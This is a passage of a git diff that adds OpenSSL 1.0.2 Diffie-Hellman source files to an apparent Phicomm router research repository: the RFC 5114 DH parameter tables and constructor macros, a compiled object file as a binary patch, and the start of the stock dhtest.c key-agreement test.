+static const BN_ULONG dh2048_224_p[] = {
+    0x0AC4DFFE0C10E64FULL, 0xCF9DE5384E71B81CULL, 0x7EF363E2FFA31F71ULL,
+    0xE3FB73C16B8E75B9ULL, 0xC9B53DCF4BA80A29ULL, 0x23F10B0E16E79763ULL,
+    0xC52172E413042E9BULL, 0xBE60E69CC928B2B9ULL, 0x80CD86A1B9E587E8ULL,
+    0x315D75E198C641A4ULL, 0xCDF93ACC44328387ULL, 0x15987D9ADC0A486DULL,
+    0x7310F7121FD5A074ULL, 0x278273C7DE31EFDCULL, 0x1602E714415D9330ULL,
+    0x81286130BC8985DBULL, 0xB3BF8A3170918836ULL, 0x6A00E0A0B9C49708ULL,
+    0xC6BA0B2C8BBC27BEULL, 0xC9F98D11ED34DBF6ULL, 0x7AD5B7D0B6C12207ULL,
+    0xD91E8FEF55B7394BULL, 0x9037C9EDEFDA4DF8ULL, 0x6D3F8152AD6AC212ULL,
+    0x1DE6B85A1274A0A6ULL, 0xEB3D688A309C180EULL, 0xAF9A3C407BA1DF15ULL,
+    0xE6FA141DF95A56DBULL, 0xB54B1597B61D0A75ULL, 0xA20D64E5683B9FD1ULL,
+    0xD660FAA79559C51FULL, 0xAD107E1E9123A9D0ULL
+};
+
+static const BN_ULONG dh2048_224_g[] = {
+    0x84B890D3191F2BFAULL, 0x81BC087F2A7065B3ULL, 0x19C418E1F6EC0179ULL,
+    0x7B5A0F1C71CFFF4CULL, 0xEDFE72FE9B6AA4BDULL, 0x81E1BCFE94B30269ULL,
+    0x566AFBB48D6C0191ULL, 0xB539CCE3409D13CDULL, 0x6AA21E7F5F2FF381ULL,
+    0xD9E263E4770589EFULL, 0x10E183EDD19963DDULL, 0xB70A8137150B8EEBULL,
+    0x051AE3D428C8F8ACULL, 0xBB77A86F0C1AB15BULL, 0x6E3025E316A330EFULL,
+    0x19529A45D6F83456ULL, 0xF180EB34118E98D1ULL, 0xB5F6C6B250717CBEULL,
+    0x09939D54DA7460CDULL, 0xE247150422EA1ED4ULL, 0xB8A762D0521BC98AULL,
+    0xF4D027275AC1348BULL, 0xC17669101999024AULL, 0xBE5E9001A8D66AD7ULL,
+    0xC57DB17C620A8652ULL, 0xAB739D7700C29F52ULL, 0xDD921F01A70C4AFAULL,
+    0xA6824A4E10B9A6F0ULL, 0x74866A08CFE4FFE3ULL, 0x6CDEBE7B89998CAFULL,
+    0x9DF30B5C8FFDAC50ULL, 0xAC4032EF4F2D9AE3ULL
+};
+
+static const BN_ULONG dh2048_224_q[] = {
+    0xBF389A99B36371EBULL, 0x1F80535A4738CEBCULL, 0xC58D93FE99717710ULL,
+    0x00000000801C0D34ULL
+};
+
+static const BN_ULONG dh2048_256_p[] = {
+    0xDB094AE91E1A1597ULL, 0x693877FAD7EF09CAULL, 0x6116D2276E11715FULL,
+    0xA4B54330C198AF12ULL, 0x75F26375D7014103ULL, 0xC3A3960A54E710C3ULL,
+    0xDED4010ABD0BE621ULL, 0xC0B857F689962856ULL, 0xB3CA3F7971506026ULL,
+    0x1CCACB83E6B486F6ULL, 0x67E144E514056425ULL, 0xF6A167B5A41825D9ULL,
+    0x3AD8347796524D8EULL, 0xF13C6D9A51BFA4ABULL, 0x2D52526735488A0EULL,
+    0xB63ACAE1CAA6B790ULL, 0x4FDB70C581B23F76ULL, 0xBC39A0BF12307F5CULL,
+    0xB941F54EB1E59BB8ULL, 0x6C5BFC11D45F9088ULL, 0x22E0B1EF4275BF7BULL,
+    0x91F9E6725B4758C0ULL, 0x5A8A9D306BCF67EDULL, 0x209E0C6497517ABDULL,
+    0x3BF4296D830E9A7CULL, 0x16C3D91134096FAAULL, 0xFAF7DF4561B2AA30ULL,
+    0xE00DF8F1D61957D4ULL, 0x5D2CEED4435E3B00ULL, 0x8CEEF608660DD0F2ULL,
+    0xFFBBD19C65195999ULL, 0x87A8E61DB4B6663CULL
+};
+
+static const BN_ULONG dh2048_256_g[] = {
+    0x664B4C0F6CC41659ULL, 0x5E2327CFEF98C582ULL, 0xD647D148D4795451ULL,
+    0x2F63078490F00EF8ULL, 0x184B523D1DB246C3ULL, 0xC7891428CDC67EB6ULL,
+    0x7FD028370DF92B52ULL, 0xB3353BBB64E0EC37ULL, 0xECD06E1557CD0915ULL,
+    0xB7D2BBD2DF016199ULL, 0xC8484B1E052588B9ULL, 0xDB2A3B7313D3FE14ULL,
+    0xD052B985D182EA0AULL, 0xA4BD1BFFE83B9C80ULL, 0xDFC967C1FB3F2E55ULL,
+    0xB5045AF2767164E1ULL, 0x1D14348F6F2F9193ULL, 0x64E67982428EBC83ULL,
+    0x8AC376D282D6ED38ULL, 0x777DE62AAAB8A862ULL, 0xDDF463E5E9EC144BULL,
+    0x0196F931C77A57F2ULL, 0xA55AE31341000A65ULL, 0x901228F8C28CBB18ULL,
+    0xBC3773BF7E8C6F62ULL, 0xBE3A6C1B0C6B47B1ULL, 0xFF4FED4AAC0BB555ULL,
+    0x10DBC15077BE463FULL, 0x07F4793A1A0BA125ULL, 0x4CA7B18F21EF2054ULL,
+    0x2E77506660EDBD48ULL, 0x3FB32C9B73134D0BULL
+};
+
+static const BN_ULONG dh2048_256_q[] = {
+    0xA308B0FE64F5FBD3ULL, 0x99B1A47D1EB3750BULL, 0xB447997640129DA2ULL,
+    0x8CF83642A709A097ULL
+};
+
+#elif BN_BITS2 == 32
+
+static const BN_ULONG dh1024_160_p[] = {
+    0x2E4A4371, 0xDF1FB2BC, 0x6D4DA708, 0xE68CFDA7, 0x365C1A65, 0x45BF37DF,
+    0x0DC8B4BD, 0xA151AF5F, 0xF55BCCC0, 0xFAA31A4F, 0xE5644738, 0x4EFFD6FA,
+    0x219A7372, 0x98488E9C, 0x90C4BD70, 0xACCBDD7D, 0xD49B83BF, 0x24975C3C,
+    0xA9061123, 0x13ECB4AE, 0x2EE652C0, 0x9838EF1E, 0x75A23D18, 0x6073E286,
+    0x52D23B61, 0x9A6A9DCA, 0xFB06A3C6, 0x52C99FBC, 0xAE5D54EC, 0xDE92DE5E,
+    0xA080E01D, 0xB10B8F96
+};
+
+static const BN_ULONG dh1024_160_g[] = {
+    0x22B3B2E5, 0x855E6EEB, 0xF97C2A24, 0x858F4DCE, 0x18D08BC8, 0x2D779D59,
+    0x8E73AFA3, 0xD662A4D1, 0x69B6A28A, 0x1DBF0A01, 0x7A091F53, 0xA6A24C08,
+    0x63F80A76, 0x909D0D22, 0xB9A92EE1, 0xD7FBD7D3, 0x9E2749F4, 0x5E91547F,
+    0xB01B886A, 0x160217B4, 0x5504F213, 0x777E690F, 0x5C41564B, 0x266FEA1E,
+    0x14266D31, 0xD6406CFF, 0x58AC507F, 0xF8104DD2, 0xEFB99905, 0x6765A442,
+    0xC3FD3412, 0xA4D1CBD5
+};
+
+static const BN_ULONG dh1024_160_q[] = {
+    0x49462353, 0x64B7CB9D, 0x8ABA4E7D, 0x81A8DF27, 0xF518AA87
+};
+
+static const BN_ULONG dh2048_224_p[] = {
+    0x0C10E64F, 0x0AC4DFFE, 0x4E71B81C, 0xCF9DE538, 0xFFA31F71, 0x7EF363E2,
+    0x6B8E75B9, 0xE3FB73C1, 0x4BA80A29, 0xC9B53DCF, 0x16E79763, 0x23F10B0E,
+    0x13042E9B, 0xC52172E4, 0xC928B2B9, 0xBE60E69C, 0xB9E587E8, 0x80CD86A1,
+    0x98C641A4, 0x315D75E1, 0x44328387, 0xCDF93ACC, 0xDC0A486D, 0x15987D9A,
+    0x1FD5A074, 0x7310F712, 0xDE31EFDC, 0x278273C7, 0x415D9330, 0x1602E714,
+    0xBC8985DB, 0x81286130, 0x70918836, 0xB3BF8A31, 0xB9C49708, 0x6A00E0A0,
+    0x8BBC27BE, 0xC6BA0B2C, 0xED34DBF6, 0xC9F98D11, 0xB6C12207, 0x7AD5B7D0,
+    0x55B7394B, 0xD91E8FEF, 0xEFDA4DF8, 0x9037C9ED, 0xAD6AC212, 0x6D3F8152,
+    0x1274A0A6, 0x1DE6B85A, 0x309C180E, 0xEB3D688A, 0x7BA1DF15, 0xAF9A3C40,
+    0xF95A56DB, 0xE6FA141D, 0xB61D0A75, 0xB54B1597, 0x683B9FD1, 0xA20D64E5,
+    0x9559C51F, 0xD660FAA7, 0x9123A9D0, 0xAD107E1E
+};
+
+static const BN_ULONG dh2048_224_g[] = {
+    0x191F2BFA, 0x84B890D3, 0x2A7065B3, 0x81BC087F, 0xF6EC0179, 0x19C418E1,
+    0x71CFFF4C, 0x7B5A0F1C, 0x9B6AA4BD, 0xEDFE72FE, 0x94B30269, 0x81E1BCFE,
+    0x8D6C0191, 0x566AFBB4, 0x409D13CD, 0xB539CCE3, 0x5F2FF381, 0x6AA21E7F,
+    0x770589EF, 0xD9E263E4, 0xD19963DD, 0x10E183ED, 0x150B8EEB, 0xB70A8137,
+    0x28C8F8AC, 0x051AE3D4, 0x0C1AB15B, 0xBB77A86F, 0x16A330EF, 0x6E3025E3,
+    0xD6F83456, 0x19529A45, 0x118E98D1, 0xF180EB34, 0x50717CBE, 0xB5F6C6B2,
+    0xDA7460CD, 0x09939D54, 0x22EA1ED4, 0xE2471504, 0x521BC98A, 0xB8A762D0,
+    0x5AC1348B, 0xF4D02727, 0x1999024A, 0xC1766910, 0xA8D66AD7, 0xBE5E9001,
+    0x620A8652, 0xC57DB17C, 0x00C29F52, 0xAB739D77, 0xA70C4AFA, 0xDD921F01,
+    0x10B9A6F0, 0xA6824A4E, 0xCFE4FFE3, 0x74866A08, 0x89998CAF, 0x6CDEBE7B,
+    0x8FFDAC50, 0x9DF30B5C, 0x4F2D9AE3, 0xAC4032EF
+};
+
+static const BN_ULONG dh2048_224_q[] = {
+    0xB36371EB, 0xBF389A99, 0x4738CEBC, 0x1F80535A, 0x99717710, 0xC58D93FE,
+    0x801C0D34
+};
+
+static const BN_ULONG dh2048_256_p[] = {
+    0x1E1A1597, 0xDB094AE9, 0xD7EF09CA, 0x693877FA, 0x6E11715F, 0x6116D227,
+    0xC198AF12, 0xA4B54330, 0xD7014103, 0x75F26375, 0x54E710C3, 0xC3A3960A,
+    0xBD0BE621, 0xDED4010A, 0x89962856, 0xC0B857F6, 0x71506026, 0xB3CA3F79,
+    0xE6B486F6, 0x1CCACB83, 0x14056425, 0x67E144E5, 0xA41825D9, 0xF6A167B5,
+    0x96524D8E, 0x3AD83477, 0x51BFA4AB, 0xF13C6D9A, 0x35488A0E, 0x2D525267,
+    0xCAA6B790, 0xB63ACAE1, 0x81B23F76, 0x4FDB70C5, 0x12307F5C, 0xBC39A0BF,
+    0xB1E59BB8, 0xB941F54E, 0xD45F9088, 0x6C5BFC11, 0x4275BF7B, 0x22E0B1EF,
+    0x5B4758C0, 0x91F9E672, 0x6BCF67ED, 0x5A8A9D30, 0x97517ABD, 0x209E0C64,
+    0x830E9A7C, 0x3BF4296D, 0x34096FAA, 0x16C3D911, 0x61B2AA30, 0xFAF7DF45,
+    0xD61957D4, 0xE00DF8F1, 0x435E3B00, 0x5D2CEED4, 0x660DD0F2, 0x8CEEF608,
+    0x65195999, 0xFFBBD19C, 0xB4B6663C, 0x87A8E61D
+};
+
+static const BN_ULONG dh2048_256_g[] = {
+    0x6CC41659, 0x664B4C0F, 0xEF98C582, 0x5E2327CF, 0xD4795451, 0xD647D148,
+    0x90F00EF8, 0x2F630784, 0x1DB246C3, 0x184B523D, 0xCDC67EB6, 0xC7891428,
+    0x0DF92B52, 0x7FD02837, 0x64E0EC37, 0xB3353BBB, 0x57CD0915, 0xECD06E15,
+    0xDF016199, 0xB7D2BBD2, 0x052588B9, 0xC8484B1E, 0x13D3FE14, 0xDB2A3B73,
+    0xD182EA0A, 0xD052B985, 0xE83B9C80, 0xA4BD1BFF, 0xFB3F2E55, 0xDFC967C1,
+    0x767164E1, 0xB5045AF2, 0x6F2F9193, 0x1D14348F, 0x428EBC83, 0x64E67982,
+    0x82D6ED38, 0x8AC376D2, 0xAAB8A862, 0x777DE62A, 0xE9EC144B, 0xDDF463E5,
+    0xC77A57F2, 0x0196F931, 0x41000A65, 0xA55AE313, 0xC28CBB18, 0x901228F8,
+    0x7E8C6F62, 0xBC3773BF, 0x0C6B47B1, 0xBE3A6C1B, 0xAC0BB555, 0xFF4FED4A,
+    0x77BE463F, 0x10DBC150, 0x1A0BA125, 0x07F4793A, 0x21EF2054, 0x4CA7B18F,
+    0x60EDBD48, 0x2E775066, 0x73134D0B, 0x3FB32C9B
+};
+
+static const BN_ULONG dh2048_256_q[] = {
+    0x64F5FBD3, 0xA308B0FE, 0x1EB3750B, 0x99B1A47D, 0x40129DA2, 0xB4479976,
+    0xA709A097, 0x8CF83642
+};
+
+#else
+# error "unsupported BN_BITS2"
+#endif
+
+/* Macro to make a BIGNUM from static data */
+
+#define make_dh_bn(x) static const BIGNUM _bignum_##x = { (BN_ULONG *) x, \
+                        sizeof(x)/sizeof(BN_ULONG),\
+                        sizeof(x)/sizeof(BN_ULONG),\
+                        0, BN_FLG_STATIC_DATA }
+
+/*
+ * Macro to make a DH structure from BIGNUM data. NB: although just copying
+ * the BIGNUM static pointers would be more efficient we can't as they get
+ * wiped using BN_clear_free() when DH_free() is called.
+ */
+
+#define make_dh(x) \
+DH * DH_get_##x(void) \
+        { \
+        DH *dh; \
+        make_dh_bn(dh##x##_p); \
+        make_dh_bn(dh##x##_q); \
+        make_dh_bn(dh##x##_g); \
+        dh = DH_new(); \
+        if (!dh) \
+                return NULL; \
+        dh->p = BN_dup(&_bignum_dh##x##_p); \
+        dh->g = BN_dup(&_bignum_dh##x##_g); \
+        dh->q = BN_dup(&_bignum_dh##x##_q); \
+        if (!dh->p || !dh->q || !dh->g) \
+                { \
+                DH_free(dh); \
+                return NULL; \
+                } \
+        return dh; \
+        }
+
+make_dh(1024_160)
+make_dh(2048_224)
+make_dh(2048_256)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_rfc5114.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_rfc5114.o
new file mode 100644
index 0000000000000000000000000000000000000000..3359ae2bd5b30ea6bd509dc1cd4ab0f434f45f32
GIT binary patch
literal 5632
zcmds)d010d7QkOXDkOkm9bAC8LS52?hF!;ivM2}`aYHnLB%sKi1d57mb%7#cosmVU
zD2%AJwQLHNwV)NP6_jEvRX_yWDy41|u!XtzaWBL-;h)Yo|IGQm_wG5rv%GU3H}_o<
zTs&RXXfy%~jrcn;VPOhJ{Ry2<s(gY;Oe0=SGaGjD{Rxs)sg3UY>g4O(4=sZx$&kJ(
zb>%!wDqxOfrR<rf336A?<I8nmzUC@Gn1q7infk<q`<M*!Ozm{?Z}@+G7JOS&nF0X3
zps0-vZ{1nIf)|v(;{RXQR|kE;3yP}#n1I6z%3tx1WfH{QH?JilUuYIE6s2bIg~d6i
z^Yr;KIc{ZH`C3KJHiPM#jT=L!d3ppTU(N2nZ83M-THm-<_ZGLdLEYanKb$Ilufes%
zbeX`z<kH@2w=4})zZNVS(y_H{POyE}DY@ckU23FtYok$k^Rt`)TF0F$cP>{RoUdW#
z;eOq4<gS6tabY|Cm*kdxm4fEP6OKQP&a5t6&tCqfKDeo)OA;0H!f#6X(If9g9OfCC
zrc`A(C&%?l?E2c0@5D5u1)i-qzpytx*2D1G&pqN-4_<8C^)+|s7)?qioD91C{$+9{
z{i{Js{mj6K^u4t*+p1!>o!T=)9ctE>GcK&|^B!I9S`+J2-_D$WiZR0>?$uOZR{!k7
z#YLX()qSEMpIA0yje+d=;?m_=Ml;NQUai%BL#zMZaID=9VU%9D#U0}S{fpW4oE7DT
z>Q1zK3h@g?1M`V5{a8W6>|RDSo!0trgXOW*fsGY)3q(Fqam#O%4(u=MO}Tkv)_jSE
zVb990;QRAU3d@5}4P>kl9E;_B@9=41?b_V1rO$QK+^vHJf+d-k&)n#`;czKtc}ddM
z$aZi41de`fzI|22@t$I@*G`oOGli{se{2ceU8`{JFYcUEx5;fwbnnoSzTn$CIeBS*
z)w|YaNwhy<?a9?m348aI<M{|Jp5FZiW6t@K0GE#6hg&yJZ+kwd(@8jPThaRK;;k>5
zb%HbpeofEWJY9OC<;v*Npi5<@y=M<RjS`pU<l5C%eQW3Dw=U6~85@-|a`ezup3ba9
zxQ2!onNPo)S@B`1G;(2rW>r!g?b$$=N#k_S(c4k8ruprzE(|$75<SwlL#^~5BUN2V
zM`)pk%HD)*xMh&X@BYTVJn7|o!UVI^A^oWuv5&=%?mrOcwDhHPF`s5IjBJzWmoE%n
zw`}d6p|PcShIYi+*em^<0^{!aobV02!8Vs%!St5w3_ae{#OF18qI^oO4V2#!$$#+8
zJF3-c_RE|pMsAPNnq~@`1B)s?;??_ESTw&{t(G&Lxg)0jUP#+nTIRMI!G3z+p5pkc
zf|Fknv3asjhgWMC(ab-7@Y|V6rq}A^Gu@+)Z)=9^mtRcJN!?xZFx2P5pNIV!FY~%{
zmw5ME@h^DyGPOrK8tJntqP*;S@@_|&7mPj<zua4?$k<sgd(-_c{jA6BW#vuctS830
zjOTNYv!@t5j-GwBvc$6KM6amkrvp8er}p1UEOfe--KE&dJ&<Cx@*9VtTVd|>A9Lfg
zjpX^?nd|?~l>OMxefYI3*@AO)tCQgqHRJYusa2c+%OsnFM<TgtwWXR_jg|SGL`aQA
z)kljNUtSw%=k@6w8fuz4r~Xp&<?nWR*k4}Xf7tB);F=%$`<iSs^}h=FOpvrZ>`cB~
z->;(ARM+GLCvE$(r$!y8cJr6!UTojsH)Lu!+^e9QUdl4^C~rCGxV=ZBbK3ms=6@Cq
zi`tsc%{^kam-*Scxvs17ZeEtedwrQ^(Q!8Ez<HC`cyEDYPf6*Vr{UZ7&0Dx<=-V}i
z_g(*}*<^EG?2>|uvW%9(z_zs0mv+$TwWjOLwRUNGo<0*p9~95g$;<3wpR2rk@6Eke
zt1LcA@IA6E<lxLN%KoNiZ17^r`e{4%#(HdU@;Cb>VgWa7f#GN<zb(P%!lpZGn1dQQ
zmHp0z(qMhwpAFyLY$=Rdv6@{~V&0)yv?i?R&-7mD41b#r+gg|Evg<m+i)&BSeY54Y
z_l$yJJ2y$saNDR?v@Cb_i46Db$m+(-_y;#H)TSJ7UFx4TZ?4`u=RPlcW>6>SWt;We
zWt%KJt=RuaCJJ!8Be;<ll6$S-oi|k{n*`5%w|>6u;l~e6I}`Jd9cC00ZYx$euq@XH
zD#GOomOcA@HfIUfRzaHFy;dAHhxhIn9(!x>y8`!h4RE=6t%rMi9c1`hU<h<5v|R#%
z_5qVNQ+ujrCOB}I05*&C5JV^(U3Ho1YHCtl%`u<dBtDqqJBbfrl><EEOd+0+s&cBU
zJ^_I_;90z#r9S?pp5VGbrNOs=4pVS`P%Oa(c_%c0VD1cb$m<{kg1JA?A<u^p2<9<B
zhddENAed(Y9dZ$bKrlZKbjbM-0>Qiy=#aA@1cLcPphJ!Yb7-q8aqJ%i3XPbG&GC8~
zVE&M^um{*s^f5;^2qMKCb95+RjbUOj;(Ww$yglalPlM{XVh$G{5ZwPd#6^fFl3s!k
zA>K*h(5<dCFBDD=>V%fEIj*Y{^l@ETQ70J6=D4m-fJIJ`Fwl=ao+R**zX>qL1CGy4
z$|*-D;klFWQ<Ly>fWznF=i#vu@$b<?F()M3h0#G`Yc7|^78An29l_y>Frj2Smt(~f
za&0)mNVYZCo~z0e3_b6w@<c(8m6FGb!?P1wfr?}`J5?S~&5FZO<sqxt|A)ug23E7;
zSgZ1o)ofLHKs76l4Vd;=PoPSavJtFoM2;Jv^@%WGOoYKnfw1xS1;fS-7&dN15-Z(>
z!BV*p6GG_b>Fw;~DfD)AUFYH}^mTIfbP>X+aA_>z>?M>a$ef^PsTAkpH~F@0ZG+bm
z{sqIIfjPMT7#$O16aasIaBuqq*)!1y<5}Rs@pBNz@joJaF&e4y?^EKdkWKz833O_F
zpi-ULK*!IODRJfglM%=LoIv&grFa(5ah(jrar_=+XQPqY&q+$WKeEqF6926dSMI+<
zi7WU2E8@7HrO1A%6wd-W?td6@96t-kf!{F{YX1zxaXhYLG)cUJ5}ys~;drt*xIs7G
zb0K5F8xYJ{q(u;XG>&tq01=UQrFhsFkVNu6!SVMXpUTnqppMGn#DR2@_lY_p#K{JM
z5BJlFI19zYHc%@h!G8zL@xHi;5|8&yf-Q>+lLrKXQ64=uZpT`*G&F!Mmwq58*pdKw
z0KpEF$p|({p$#>5bObvzLL3kZc*IzcI3g@e8V+*8Bji#xICCwL$pgeYkqx$Ec4Tx!
zq%>L{hiXZ;3xlEq!lbCf|88J`boj2`p_JhxdnNjNVmHMk;Qj$$F&_t@kqI{$Ao%aA
z19X^+zm#}wEkGQ9{((u#htvllPQ`FPf;InYKHNBAO=><o(?T(!JdpbB=7Jbi^Y=l4
zc-_GH!_ydb{;L3kk5FEdz$EGr5KSE6ASPJked4wjs4$;1fk=&o9<+$U@pSO$2mDx9
z4)wr|Dnk{qA%MYe4z+(Dl+OY_WucZ$22S{VYJMaNj8skrIyFBYFjep0Qg1BL9p%IK
z4^MA6AFn@E&xR?TC{TnJ23*djD)Qk8lDc*PBKX?yP7qC$mrF4T*ruxdNYsBiS!Loz
G&HpzNOp$5;

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dhtest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dhtest.c
new file mode 100644
index 0000000..c9dd76b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dhtest.c
@@ -0,0 +1,564 @@
+/* crypto/dh/dhtest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * Until the key-gen callbacks are modified to use newer prototypes, we allow
+ * deprecated functions for openssl-internal code
+ */
+#ifdef OPENSSL_NO_DEPRECATED
+# undef OPENSSL_NO_DEPRECATED
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include "../e_os.h"
+
+#include <openssl/crypto.h>
+#include <openssl/bio.h>
+#include <openssl/bn.h>
+#include <openssl/rand.h>
+#include <openssl/err.h>
+
+#ifdef OPENSSL_NO_DH
+int main(int argc, char *argv[])
+{
+    printf("No DH support\n");
+    return (0);
+}
+#else
+# include <openssl/dh.h>
+
+# ifdef OPENSSL_SYS_WIN16
+#  define MS_CALLBACK     _far _loadds
+# else
+#  define MS_CALLBACK
+# endif
+
+static int MS_CALLBACK cb(int p, int n, BN_GENCB *arg);
+
+static const char rnd_seed[] =
+    "string to make the random number generator think it has entropy";
+
+static int run_rfc5114_tests(void);
+
+int main(int argc, char *argv[])
+{
+    BN_GENCB _cb;
+    DH *a;
+    DH *b = NULL;
+    char buf[12];
+    unsigned char *abuf = NULL, *bbuf = NULL;
+    int i, alen, blen, aout, bout, ret = 1;
+    BIO *out;
+
+    CRYPTO_malloc_debug_init();
+    CRYPTO_dbg_set_options(V_CRYPTO_MDEBUG_ALL);
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+# ifdef OPENSSL_SYS_WIN32
+    CRYPTO_malloc_init();
+# endif
+
+    RAND_seed(rnd_seed, sizeof rnd_seed);
+
+    out = BIO_new(BIO_s_file());
+    if (out == NULL)
+        EXIT(1);
+    BIO_set_fp(out, stdout, BIO_NOCLOSE);
+
+    BN_GENCB_set(&_cb, &cb, out);
+    if (((a = DH_new()) == NULL) || !DH_generate_parameters_ex(a, 64,
+                                                               DH_GENERATOR_5,
+                                                               &_cb))
+        goto err;
+
+    if (!DH_check(a, &i))
+        goto err;
+    if (i & DH_CHECK_P_NOT_PRIME)
+        BIO_puts(out, "p value is not prime\n");
+    if (i & DH_CHECK_P_NOT_SAFE_PRIME)
+        BIO_puts(out, "p value is not a safe prime\n");
+    if (i & DH_UNABLE_TO_CHECK_GENERATOR)
+        BIO_puts(out, "unable to check the generator value\n");
+    if (i & DH_NOT_SUITABLE_GENERATOR)
+        BIO_puts(out, "the g value is not a generator\n");
+
+    BIO_puts(out, "\np    =");
+    BN_print(out, a->p);
+    BIO_puts(out, "\ng    =");
+    BN_print(out, a->g);
+    BIO_puts(out, "\n");
+
+    b = DH_new();
+    if (b == NULL)
+        goto err;
+
+    b->p = BN_dup(a->p);
+    b->g = BN_dup(a->g);
+    if ((b->p == NULL) || (b->g == NULL))
+        goto err;
+
+    /* Set a to run with normal modexp and b to use constant time */
+    a->flags &= ~DH_FLAG_NO_EXP_CONSTTIME;
+    b->flags |= DH_FLAG_NO_EXP_CONSTTIME;
+
+    if (!DH_generate_key(a))
+        goto err;
+    BIO_puts(out, "pri 1=");
+    BN_print(out, a->priv_key);
+    BIO_puts(out, "\npub 1=");
+    BN_print(out, a->pub_key);
+    BIO_puts(out, "\n");
+
+    if (!DH_generate_key(b))
+        goto err;
+    BIO_puts(out, "pri 2=");
+    BN_print(out, b->priv_key);
+    BIO_puts(out, "\npub 2=");
+    BN_print(out, b->pub_key);
+    BIO_puts(out, "\n");
+
+    alen = DH_size(a);
+    abuf = (unsigned char *)OPENSSL_malloc(alen);
+    aout = DH_compute_key(abuf, b->pub_key, a);
+
+    BIO_puts(out, "key1 =");
+    for (i = 0; i < aout; i++) {
+        sprintf(buf, "%02X", abuf[i]);
+        BIO_puts(out, buf);
+    }
+    BIO_puts(out, "\n");
+
+    blen = DH_size(b);
+    bbuf = (unsigned char *)OPENSSL_malloc(blen);
+    bout = DH_compute_key(bbuf, a->pub_key, b);
+
+    BIO_puts(out, "key2 =");
+    for (i = 0; i < bout; i++) {
+        sprintf(buf, "%02X", bbuf[i]);
+        BIO_puts(out, buf);
+    }
+    BIO_puts(out, "\n");
+    if ((aout < 4) || (bout != aout) || (memcmp(abuf, bbuf, aout) != 0)) {
+        fprintf(stderr, "Error in DH routines\n");
+        ret = 1;
+    } else
+        ret = 0;
+    if (!run_rfc5114_tests())
+        ret = 1;
+ err:
+    ERR_print_errors_fp(stderr);
+
+    if (abuf != NULL)
+        OPENSSL_free(abuf);
+    if (bbuf != NULL)
+        OPENSSL_free(bbuf);
+    if (b != NULL)
+        DH_free(b);
+    if (a != NULL)
+        DH_free(a);
+    BIO_free(out);
+# ifdef OPENSSL_SYS_NETWARE
+    if (ret)
+        printf("ERROR: %d\n", ret);
+# endif
+    EXIT(ret);
+    return (ret);
+}
+
+static int MS_CALLBACK cb(int p, int n, BN_GENCB *arg)
+{
+    char c = '*';
+
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    BIO_write(arg->arg, &c, 1);
+    (void)BIO_flush(arg->arg);
+# ifdef LINT
+    p = n;
+# endif
+    return 1;
+}
+
+/* Test data from RFC 5114 */
+
+static const unsigned char dhtest_1024_160_xA[] = {
+    0xB9, 0xA3, 0xB3, 0xAE, 0x8F, 0xEF, 0xC1, 0xA2, 0x93, 0x04, 0x96, 0x50,
+    0x70, 0x86, 0xF8, 0x45, 0x5D, 0x48, 0x94, 0x3E
